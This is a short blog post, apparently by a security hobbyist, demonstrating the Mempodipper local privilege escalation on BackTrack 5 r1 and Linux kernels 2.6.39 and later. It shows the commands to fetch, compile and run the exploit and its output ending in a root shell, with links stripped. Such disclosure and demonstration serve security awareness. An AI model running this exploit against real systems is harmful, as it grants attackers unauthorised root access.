Backtrack 5 kernel whoops !!

Hackers For Charity

If you run Backtrack 5 r1 as a non-root user, and apparently many other kernels of linux >=2.6.39 can be exploited to get root via a Linux Local Privilege Escalation via SUID /proc/pid/mem Write. Read more from blog Exploit code can be obtained here href=”

chalo@bt:~$ uname -a
Linux bt #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami

This entry was posted in Uncategorized. Bookmark the permalink.

3 Responses to Backtrack 5 kernel whoops !!

  1. G1 says:

    Hey – I noticed your posting. I created a proof of concept video on this.

  2. Aircrack Ng says:

    great video johnny ..thanks

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s